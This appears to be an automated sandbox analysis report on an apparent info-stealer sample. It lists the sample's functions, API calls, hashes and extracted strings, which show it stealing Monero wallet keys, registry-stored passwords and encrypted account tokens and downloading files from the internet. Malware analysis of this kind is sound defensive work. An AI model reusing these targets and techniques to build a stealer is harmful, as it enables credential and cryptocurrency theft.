                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: e3f72cf8bf65cce959a52b7742ceafe76b9a8262c9841d1e56db0de8468b5d39
                                  • Instruction ID: 00b3e6af73f1abfd16068dab9eaab10b47618a00784b8c7819253307c393ba98
                                  • Opcode Fuzzy Hash: e3f72cf8bf65cce959a52b7742ceafe76b9a8262c9841d1e56db0de8468b5d39
                                  • Instruction Fuzzy Hash: 34511230E101489BEB18FF64CE96AED7779AF20300F504019F80A9B591EF386B45CB62
                                  Function 00A71310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A712B4
                                    • Part of subcall function 00A712A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A712BB
                                    • Part of subcall function 00A712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A712D7
                                    • Part of subcall function 00A712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A712F5
                                    • Part of subcall function 00A712A0: RegCloseKey.ADVAPI32(?), ref: 00A712FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7134F
                                  • lstrlen.KERNEL32(?), ref: 00A7135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00A71377
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A71465
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A714EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: bcb5b7bc98dc0b143de1b74705ffa13b95a0b3e387840cfc75dd6583eedf99d9
                                  • Instruction ID: 9fb6578f7e29029c6f0e41b09dd907760638f138e22ff06be7aeb79a090c0aa8
                                  • Opcode Fuzzy Hash: bcb5b7bc98dc0b143de1b74705ffa13b95a0b3e387840cfc75dd6583eedf99d9
                                  • Instruction Fuzzy Hash: 755197B1D1011857DB15FB60DE96FED737CAF64300F4045D9B60AA2082EE346B8ACFA6
                                  Function 00A775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A7733A
                                    • Part of subcall function 00A772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A773B1
                                    • Part of subcall function 00A772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A7740D
                                    • Part of subcall function 00A772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A77452
                                    • Part of subcall function 00A772D0: HeapFree.KERNEL32(00000000), ref: 00A77459
                                  • lstrcat.KERNEL32(00000000,00A917FC), ref: 00A77606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A77648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00A7765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A7768F
                                  • lstrcat.KERNEL32(00000000,00A91804), ref: 00A776A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A776D3
                                  • lstrcat.KERNEL32(00000000,00A91808), ref: 00A776ED
                                  • task.LIBCPMTD ref: 00A776FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 9e7ebc3eef4d027ed61eaf3a271a63c00a656ce3ecd84281288123abef29ec38
                                  • Instruction ID: c3532739cc936c3fb355d0c09e27faaf23c3fddf0587cd4d3538cdb1ce26d44a
                                  • Opcode Fuzzy Hash: 9e7ebc3eef4d027ed61eaf3a271a63c00a656ce3ecd84281288123abef29ec38
                                  • Instruction Fuzzy Hash: CC311CB1A00109EBCB04EBB4DD99FFF7779BB54301F14C618F106A72A1DA35A946CB52
                                  Function 00A760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                  • InternetOpenA.WININET(00A90DF7,00000001,00000000,00000000,00000000), ref: 00A7610F
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A7618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A761B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00A761DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A7620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00A76249
                                  • InternetCloseHandle.WININET(?), ref: 00A76253
                                  • InternetCloseHandle.WININET(00000000), ref: 00A76260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 72ab4e8563375b1f8602eb890e2f37a7b90b9fac3e73c3650892d128f75e43f9
                                  • Instruction ID: 7c9ec8bae6fbfe7ee12e51b1d64be05e6cda825cf27c16e80942a7ac56bc6ba7
                                  • Opcode Fuzzy Hash: 72ab4e8563375b1f8602eb890e2f37a7b90b9fac3e73c3650892d128f75e43f9
                                  • Instruction Fuzzy Hash: 135160B1A00618ABEB20DF60DD49BEE77B8EB44701F10C198B609B71C1DB746A89CF95
                                  Function 00A772D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A7733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A773B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A7740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00A77452
                                  • HeapFree.KERNEL32(00000000), ref: 00A77459
                                  • task.LIBCPMTD ref: 00A77555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0d65ab8f54ce67e9cde47365f7bbc94e58cfb311acf373bdbd56bad599bb7ed5
                                  • Instruction ID: 7fa057db4cdab60d53cb400a1a861a34859693ed82bfa2e90a6ac8c15c732373
                                  • Opcode Fuzzy Hash: 0d65ab8f54ce67e9cde47365f7bbc94e58cfb311acf373bdbd56bad599bb7ed5
                                  • Instruction Fuzzy Hash: D16119B59441689BDB24DB50CD45BDEB7B8BF48300F00C1E9E68DA6141EBB46BC9CFA1
                                  Function 00A840B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0068D980,00000000,00020119,?), ref: 00A840F4
                                  • RegQueryValueExA.ADVAPI32(?,0068E958,00000000,00000000,00000000,000000FF), ref: 00A84118
                                  • RegCloseKey.ADVAPI32(?), ref: 00A84122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84147
                                  • lstrcat.KERNEL32(?,0068E9A0), ref: 00A8415B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID: Xh$h
                                  • API String ID: 690832082-4013920764
                                  • Opcode ID: 8e5724b9a3a92b3b70c74f404faadb26d5ed79c7ab0d9c22129ea352ac97bce1
                                  • Instruction ID: 9fc0f71aadc5f80108fc8e163d493737372d1cc429cd58e1a96039e09c321fb2
                                  • Opcode Fuzzy Hash: 8e5724b9a3a92b3b70c74f404faadb26d5ed79c7ab0d9c22129ea352ac97bce1
                                  • Instruction Fuzzy Hash: 8441ABB7D00108ABDB14FBA0DD46FFE737DAB98300F408658B65957181EE755B888BD2
                                  Function 00A88100 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0068EEB0,00000000,?,00A90E2C,00000000,?,00000000), ref: 00A88130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A88158
                                  • wsprintfA.USER32 ref: 00A881AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@$ph
                                  • API String ID: 2922868504-2567548595
                                  • Opcode ID: 5ba146414facbb0781a302b9753f325e5992c21733d2885cb381edfd937d538d
                                  • Instruction ID: 5b575b7155494887bd417db0d68d1f7f0b8f576cdcda3d8e3c6b759711e11496
                                  • Opcode Fuzzy Hash: 5ba146414facbb0781a302b9753f325e5992c21733d2885cb381edfd937d538d
                                  • Instruction Fuzzy Hash: 85212EB1E44218ABDB04DFD4CD49FAEB7B8FB44B50F104609F605BB2C0DB7959018BA5
                                  Function 00A7BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BC9F
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A7BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 359e9226f4986e792b2540028f318bb7599d138a4f4a1984cd2e7b33d6bfd71e
                                  • Instruction ID: 471ba249c29f816b4fa7e347670991f3f7306cdf11952b8312e9b7e870874bc3
                                  • Opcode Fuzzy Hash: 359e9226f4986e792b2540028f318bb7599d138a4f4a1984cd2e7b33d6bfd71e
                                  • Instruction Fuzzy Hash: AFB10471D10118ABEF14FBA0DE96EEE7378AF64300F404559F506B6191EF386A49CB72
                                  Function 00A86770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: f1dba84060a38136ae16f157be4da283c58ed4b18fb2a0d70b23b6a6b13a4895
                                  • Instruction ID: af32eda9b01d1a9f8ca9f316a60cf5c96710c9eaef20048a25089b245a079fb4
                                  • Opcode Fuzzy Hash: f1dba84060a38136ae16f157be4da283c58ed4b18fb2a0d70b23b6a6b13a4895
